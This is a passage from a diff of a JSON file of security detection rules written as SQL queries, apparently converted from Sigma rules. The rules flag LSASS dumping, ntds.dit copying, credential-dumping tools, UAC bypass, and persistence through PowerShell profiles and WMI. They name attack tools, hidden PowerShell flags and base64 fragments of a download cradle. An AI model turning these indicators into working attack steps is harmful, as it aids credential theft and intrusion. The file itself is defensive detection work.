LIKE '%0x1418%' ESCAPE '\\' OR AccessMask LIKE '%0x1f0fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f1fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f2fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f3fff%' ESCAPE '\\')) OR (EventID = '4663' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessList LIKE '%4484%' ESCAPE '\\' OR AccessList LIKE '%4416%' ESCAPE '\\'))) AND NOT (((ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\lsm.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\minionhost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\VsTskMgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\GamingServices.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MRT.exe' ESCAPE '\\' OR ProcessName LIKE '%RtkAudUService64' ESCAPE '\\') AND (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWow64\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysNative\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\taskhostw.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\aurora\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE '%\\\\x64\\\\SCENARIOENGINE.EXE' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND ProcessName LIKE '%\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\program.exe' ESCAPE '\\'" ], - "filename": "win_security_susp_lsass_dump_generic.yml" + "filename": "file_event_win_creation_unquoted_service_path.yml" }, { - "title": "Credential Dumping Tools Service Execution - Security", - "id": "f0d1feba-4344-4ca9-8121-a6c97bd6df52", - "status": "test", - "description": "Detects well-known credential dumping tools execution via service execution events", - "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "title": "Suspicious Process Writes Ntds.dit", + "id": "11b1ed55-154d-4e82-8ad7-83739298f720", + "status": "experimental", + "description": "Detects suspicious processes that write (copy) a Active Directory database (ntds.dit) file", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.execution", - "attack.t1003.001", "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006", - "attack.t1569.002", - "attack.s0005" + "attack.t1003.003" ], "falsepositives": [ - "Legitimate Administrator using credential dumping tool for password recovery" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%fgexec%' ESCAPE '\\' OR ServiceFileName LIKE '%dumpsvc%' ESCAPE '\\' OR ServiceFileName LIKE '%cachedump%' ESCAPE '\\' OR ServiceFileName LIKE '%mimidrv%' ESCAPE '\\' OR ServiceFileName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceFileName LIKE '%servpw%' ESCAPE '\\' OR ServiceFileName LIKE '%pwdump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\'))" ], - "filename": "win_security_mal_creddumper.yml" + "filename": "file_event_win_susp_ntds_dit.yml" }, { - "title": "Win Susp Computer Name Containing Samtheadmin", - "id": "39698b3f-da92-4bc6-bfb5-645a98386e45", + "title": "Suspicious Get-Variable.exe Creation", + "id": "0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b", "status": "experimental", - "description": "Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool", - "author": "elhoim", + "description": "Get-Variable is a valid PowerShell cmdlet\nWindowsApps is by default in the path where PowerShell is executed.\nSo when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.\n", + "author": "frack113", "tags": [ - "cve.2021.42278", - "cve.2021.42287", "attack.persistence", - "attack.privilege_escalation", - "attack.t1078" + "attack.t1546", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((SamAccountName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND SamAccountName LIKE '%$' ESCAPE '\\') OR (TargetUserName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND TargetUserName LIKE '%$' ESCAPE '\\')))" + "SELECT * FROM logs WHERE TargetFilename LIKE '%Local\\\\Microsoft\\\\WindowsApps\\\\Get-Variable.exe' ESCAPE '\\'" ], - "filename": "win_security_susp_computer_name.yml" + "filename": "file_event_win_susp_get_variable.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - Security", - "id": "fd0f5778-d3cb-4c9a-9695-66759d04702a", + "title": "DLL Search Order Hijackig Via Additional Space in Path", + "id": "b6f91281-20aa-446a-b986-38a92813a18f", "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "description": "Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)\nbut with a space in order to trick DLL load search order and perform a \"DLL Search Order Hijacking\" attack\n", + "author": "frack113, Nasreddine Bencherchali", "tags": [ + "attack.persistence", + "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1027" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ServiceFileName REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ServiceFileName REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ServiceFileName REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ServiceFileName REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ServiceFileName REGEXP '\\$VerbosePreference\\.ToString\\(' OR ServiceFileName REGEXP '\\String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files (x86) \\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.dll' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_obfuscated_iex_services_security.yml" + "filename": "file_event_win_dll_sideloading_space_path.yml" }, { - "title": "Security Eventlog Cleared", - "id": "d99b79d2-0a6f-4f46-ad8b-260b6e17f982", + "title": "WMI Persistence - Script Event Consumer File Write", + "id": "33f41cdd-35ac-4ba8-814b-c6a4244a1ad4", "status": "test", - "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects file writes of WMI script event consumer", + "author": "Thomas Patzke", "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "car.2016-04-002" + "attack.t1546.003", + "attack.persistence" ], "falsepositives": [ - "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", - "System provisioning (system reset before the golden image creation)" + "Dell Power Manager (C:\\Program Files\\Dell\\PowerManager\\DpmPowerPlanSetup.exe)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '517' AND Provider_Name = 'Security') OR (EventID = '1102' AND Provider_Name = 'Microsoft-Windows-Eventlog')))" + "SELECT * FROM logs WHERE NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\scrcons.exe' ESCAPE '\\'" ], - "filename": "win_security_susp_eventlog_cleared.yml" + "filename": "file_event_win_wmi_persistence_script_event_consumer_write.yml" }, { - "title": "DiagTrackEoP Default Login Username", - "id": "2111118f-7e46-4fc8-974a-59fd8ec95196", + "title": "LSASS Process Dump Artefact In CrashDumps Folder", + "id": "6902955a-01b7-432c-b32a-6f5f81d8f625", "status": "experimental", - "description": "Detects the default \"UserName\" used by the DiagTrackEoP POC", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the presence of an LSASS dump file in the \"CrashDumps\" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.", + "author": "@pbssubhash", "tags": [ - "attack.privilege_escalation" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Rare legitimate dump of the process by the operating system due to a crash of lsass" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND TargetOutboundUserName = 'thisisnotvaliduser')" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\CrashDumps\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%lsass.exe.%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\')" ], - "filename": "win_security_diagtrack_eop_default_login_username.yml" + "filename": "file_event_win_lsass_shtinkering.yml" }, { - "title": "RDP over Reverse SSH Tunnel WFP", - "id": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", + "title": "CVE-2021-44077 POC Default Dropped File", + "id": "7b501acf-fa98-4272-aa39-194f82edc8a3", "status": "experimental", - "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", - "author": "Samir Bousseaden", + "description": "Detects the creation of \"msiexec.exe\" in the \"bin\" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.lateral_movement", - "attack.t1090.001", - "attack.t1090.002", - "attack.t1021.001", - "car.2013-07-002" + "attack.execution", + "cve.2021.44077" ], "falsepositives": [ - "Programs that connect locally to the RDP port" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND ((SourcePort = '3389' AND (DestAddress LIKE '127.%' ESCAPE '\\' OR DestAddress LIKE '::1' ESCAPE '\\')) OR (DestPort = '3389' AND (SourceAddress LIKE '127.%' ESCAPE '\\' OR SourceAddress LIKE '::1' ESCAPE '\\')))) AND NOT ((FilterOrigin = 'AppContainer Loopback') OR ((Application LIKE '%\\\\thor.exe' ESCAPE '\\' OR Application LIKE '%\\\\thor64.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\ManageEngine\\\\SupportCenterPlus\\\\bin\\\\msiexec.exe' ESCAPE '\\'" ], - "filename": "win_security_rdp_reverse_tunnel.yml" + "filename": "file_event_win_cve_2021_44077_poc_default_files.yml" }, { - "title": "Suspicious Scheduled Task Creation", - "id": "3a734d25-df5c-4b99-8034-af1ddb5883a4", + "title": "Suspicious Interactive PowerShell as SYSTEM", + "id": "5b40a734-99b6-4b98-a1d0-1cea51a08ab2", "status": "experimental", - "description": "Detects suspicious scheduled task creation events. Based on attributes such as paths, commands line flags, etc.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Administrative activity", + "PowerShell scripts running as SYSTEM user" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\PowerShell\\\\PSReadLine\\\\ConsoleHost\\_history.txt' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\PowerShell\\\\StartupProfileData-Interactive' ESCAPE '\\')" + ], + "filename": "file_event_win_susp_system_interactive_powershell.yml" + }, + { + "title": "Potential Remote Credential Dumping Activity", + "id": "6e2a900a-ced9-4e4a-a9c2-13e706f9518a", + "status": "experimental", + "description": "Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.", + "author": "SecurityAura", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.persistence", - "attack.t1053.005" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4698' AND (TaskContent LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContent LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContent LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContent LIKE '%regsvr32%' ESCAPE '\\' OR TaskContent LIKE '%rundll32%' ESCAPE '\\' OR TaskContent LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContent LIKE '%cmd%' ESCAPE '\\' OR TaskContent LIKE '%/c %' ESCAPE '\\' OR TaskContent LIKE '%/k %' ESCAPE '\\' OR TaskContent LIKE '%/r %' ESCAPE '\\' OR TaskContent LIKE '%powershell%' ESCAPE '\\' OR TaskContent LIKE '%pwsh%' ESCAPE '\\' OR TaskContent LIKE '%mshta%' ESCAPE '\\' OR TaskContent LIKE '%wscript%' ESCAPE '\\' OR TaskContent LIKE '%cscript%' ESCAPE '\\' OR TaskContent LIKE '%certutil%' ESCAPE '\\' OR TaskContent LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContent LIKE '%bash.exe%' ESCAPE '\\' OR TaskContent LIKE '%bash %' ESCAPE '\\' OR TaskContent LIKE '%scrcons%' ESCAPE '\\' OR TaskContent LIKE '%wmic %' ESCAPE '\\' OR TaskContent LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContent LIKE '%forfiles%' ESCAPE '\\' OR TaskContent LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContent LIKE '%hh.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename REGEXP '\\\\Windows\\\\System32\\\\[a-zA-Z0-9]{8}\\.tmp$')" ], - "filename": "win_security_susp_scheduled_task_creation.yml" + "filename": "file_event_win_remote_cred_dump.yml" }, { - "title": "Remote WMI ActiveScriptEventConsumers", - "id": "9599c180-e3a8-4743-8f92-7fb96d3be648", + "title": "Suspicious Scheduled Task Write to System32 Tasks", + "id": "80e1f67a-4596-4351-98f5-a9c3efabac95", "status": "test", - "description": "Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects the creation of tasks from processes executed from suspicious locations", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", "attack.persistence", - "attack.t1546.003" + "attack.execution", + "attack.t1053" ], "falsepositives": [ - "SCCM" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4624' AND LogonType = '3' AND ProcessName LIKE '%scrcons.exe' ESCAPE '\\') AND NOT (TargetLogonId = '0x3e7'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Windows\\\\System32\\\\Tasks%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\PerfLogs%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\System32\\\\config\\\\systemprofile%' ESCAPE '\\'))" ], - "filename": "win_security_scrcons_remote_wmi_scripteventconsumer.yml" + "filename": "file_event_win_susp_task_write.yml" }, { - "title": "OilRig APT Schedule Task Persistence - Security", - "id": "c0580559-a6bd-4ef6-b9b7-83703d98b561", + "title": "PowerShell Profile Modification", + "id": "b5b78988-486d-4a80-b991-930eff3ff8bf", "status": "test", - "description": "Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", + "author": "HieuTT35, Nasreddine Bencherchali", "tags": [ "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" + "attack.privilege_escalation", + "attack.t1546.013" ], "falsepositives": [ - "Unlikely" + "System administrator creating Powershell profile manually" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4698' AND TaskName IN ('SC Scheduled Scan', 'UpdatMachine'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Microsoft.PowerShell\\_profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WindowsPowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Program Files\\\\PowerShell\\\\7\\\\profile.ps1' ESCAPE '\\')" ], - "filename": "win_security_apt_oilrig_mar18.yml" + "filename": "file_event_win_susp_powershell_profile.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - Security", - "id": "1a0a2ff1-611b-4dac-8216-8a7b47c618a6", + "title": "Suspicious File Event With Teams Objects", + "id": "6902955a-01b7-432c-b32a-6f5f81d8f624", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "author": "@SerkinValery", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1528" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%(Clipboard|i%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_via_use_clip_services_security.yml" + "filename": "file_event_win_access_susp_teams.yml" }, { - "title": "Replay Attack Detected", - "id": "5a44727c-3b85-4713-8c44-4401d5499629", - "status": "experimental", - "description": "Detects possible Kerberos Replay Attack on the domain controllers when \"KRB_AP_ERR_REPEAT\" Kerberos response is sent to the client", - "author": "frack113", + "title": "Suspicious Outlook Macro Created", + "id": "117d3d3a-755c-4a61-b23e-9171146d094c", + "status": "test", + "description": "Detects the creation of a macro file for Outlook.", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" + ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4649')" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Microsoft\\\\Outlook\\\\VbaProject.OTM' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\'))" ], - "filename": "win_security_replay_attack_detected.yml" + "filename": "file_event_win_office_outlook_susp_macro_creation.yml" }, { - "title": "CobaltStrike Service Installations - Security", - "id": "d7a95147-145f-4678-b85d-d1ff4a3bb3f6", + "title": "UAC Bypass Using Consent and Comctl32 - File", + "id": "62ed5b55-f991-406a-85d9-e8e8fdf18789", "status": "test", - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", - "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", + "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", + "attack.defense_evasion", "attack.privilege_escalation", - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%ADMIN$%' ESCAPE '\\' AND ServiceFileName LIKE '%.exe%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%start%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\') OR ServiceFileName LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR (ServiceFileName LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ServiceFileName LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ServiceFileName LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.@%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" ], - "filename": "win_security_cobaltstrike_service_installs.yml" + "filename": "file_event_win_uac_bypass_consent_comctl32.yml" }, { - "title": "AD Privileged Users or Groups Reconnaissance", - "id": "35ba1d85-724d-42a3-889f-2e2362bcaf23", + "title": "Suspicious Binary Writes Via AnyDesk", + "id": "2d367498-5112-4ae5-a06a-96e7bc33a211", "status": "experimental", - "description": "Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs", - "author": "Samir Bousseaden", + "description": "Detects AnyDesk writing binary files to disk other than \"gcapi.dll\".\nAccording to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll,\nwhich is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1087.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "If source account name is not an admin then its super suspicious" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4661' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\')) AND ((ObjectName LIKE '%-512' ESCAPE '\\' OR ObjectName LIKE '%-502' ESCAPE '\\' OR ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-505' ESCAPE '\\' OR ObjectName LIKE '%-519' ESCAPE '\\' OR ObjectName LIKE '%-520' ESCAPE '\\' OR ObjectName LIKE '%-544' ESCAPE '\\' OR ObjectName LIKE '%-551' ESCAPE '\\' OR ObjectName LIKE '%-555' ESCAPE '\\') OR ObjectName LIKE '%admin%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\anydesk.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%\\\\gcapi.dll' ESCAPE '\\')))" ], - "filename": "win_security_account_discovery.yml" + "filename": "file_event_win_anydesk_writing_susp_binaries.yml" }, { - "title": "PowerShell Scripts Installed as Services - Security", - "id": "2a926e6a-4b81-4011-8a96-e36cc8c04302", + "title": "Dumpert Process Dumper Default File", + "id": "93d94efc-d7ad-4161-ad7d-1638c4f908d8", "status": "test", - "description": "Detects powershell script installed as a Service", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Very unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%powershell%' ESCAPE '\\' OR ServiceFileName LIKE '%pwsh%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\dumpert.dmp' ESCAPE '\\'" ], - "filename": "win_security_powershell_script_installed_as_service.yml" + "filename": "file_event_win_hktl_dumpert.yml" }, { - "title": "Hidden Local User Creation", - "id": "7b449a5e-1db5-4dd0-a2dc-4e3a67282538", + "title": "Potential DCOM InternetExplorer.Application DLL Hijack", + "id": "2f7979ae-f82b-45af-ac1d-2b10e93b0baa", "status": "test", - "description": "Detects the creation of a local hidden user account which should not happen for event ID 4720.", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class over the network", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", "tags": [ - "attack.persistence", - "attack.t1136.001" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND TargetUserName LIKE '%$' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName = 'System' AND TargetFilename LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" ], - "filename": "win_security_hidden_user_creation.yml" + "filename": 